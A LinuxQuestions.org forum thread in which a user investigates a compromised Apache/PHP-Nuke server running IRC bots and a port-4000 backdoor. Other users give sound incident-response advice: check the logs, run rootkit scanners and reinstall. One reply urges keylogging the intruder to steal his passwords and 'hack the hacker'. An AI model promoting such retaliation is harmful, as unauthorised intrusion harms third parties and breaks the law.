Linux - SecurityThis forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
I'm very worried about the security of my companies server. We only have a web server and sshd running on it .
Its a mandrake 9.2 machine with apache2-2.0.47 on it. When looking at the syslog i started getting suspicious. I then did a netstat -anp which made me even more worried. Here is how it looks:
Note: I've not used my servers real IP address (192.16.4.2)
I've found out that all these programs that are trying to access irc ( Is this correct?) are running under the apache user, which means that our webserver has been hacked, or so I think. Luckily the firewall is blocking these outgoing messages. Also there was a program called "mech" running doing exactly the same as the programs above, but i've now killed it, so it's no longer running. It is also interesting that this mech program was located in /var/tmp/PsY/
Well I think it is quite obvious what my question is. Is there a vulnerability in my webserver configuration and how do I go about finding it? Any suggested reading that I should do?
Also I've been using tripwire so I'm going to go through its report to try find out what has happened.
I took the server off the Net. But I would really like to learn more about what happened, or else it will keep happening.
I've taken a look at the syslog and it seems shorewall started blocking these IRC requests on the 23 March. So I've not been very observant :-(
Surely there is some way to search the relevant logs for events that happened around that time? I just don't know which logs to check. I'm guessing that whoever hacked the server wanted to keep this server accessible for later on, so there must be something in the startup scripts ( or similar) that I can use to find more info.
I've also found out that apache now has port 4000 open ( the door for the hacker, I'm guessing)
How would I find out if the person has hacked only apache or has been able to hack root?
I really want to use this bad experience as a way to learn more about security, so _any_ hints or additional info would really be appreciated.
How about you put a nice keylogger and another computer bridging the connection so you can sniff it without the hacker noticing it?
Now you let the hacker play around on your server and he is bound to log into something or do some stuff. So you log his passwords and get to know his ip and as he seems to like irc his nick and other info on him. You might even find out how he is getting in.
You would hack the hacker. You can then do what you want but I would say pay back time
First let me say that a complete format and reinstall will be necessary when your done doing forensics.
Probably good places to start looking would be to take a look at the apache/httpd logs for any abnormal error messages. Also look through the general system logs for anything suspicious. You should definitely download and run rootkit hunter and chkrootkit on the system, as there are a bunch of things listening as services that shouldn't be (like init for example), which makes a rootkit likely. If that's the case, then you may need to use a cd-based distro like knoppix-std or FIRE to do any further analysis.
You may have some luck looking those processes up by their process ID number in /proc/<PID>/cmdline. If you find anything interesting there (like a path to the binary) take a look at the contents and see what you can find.
With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root?
I'm not in front of my server right now, so all the info I post now is out of my head.
I will make sure that I format and reinstall once I've my detective work.
I have run the chkrootkit and found an infected item ( I will post more detail later, when I'm infront of my box) listening on port 4000.
I've found the direrectory where the hacker downloaded/placed his tools, It's in /var/tmp if I'm not mistaken and that directory is owned by the apache user. And yes init was running and located in this directory. What is the relevance of init running?
Quote:
With regards to how you got cracked, what version of apache were you running? Were you hosting any content other than static html pages, like cgi or php for example? File permission for stuff in the server root?
I was running apache 2.0.47, with a php-nuke based site. I've not heard of any hacks against php-nuke, so it might have been the apache-version that had problems? There were very few ports open, a few required ports, port 80, and port 22( for ssh, used only with private/public keys)
Thanks very much for the links, I see I have much reading to do.
I've read up on phpnuke too, and wanted to start a website using that program, but I was apprehensive about it.
To prevent something like this again, you might want to try the patched versions from Nuke fixes, which, among other things, filter out mysql injection attacks.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.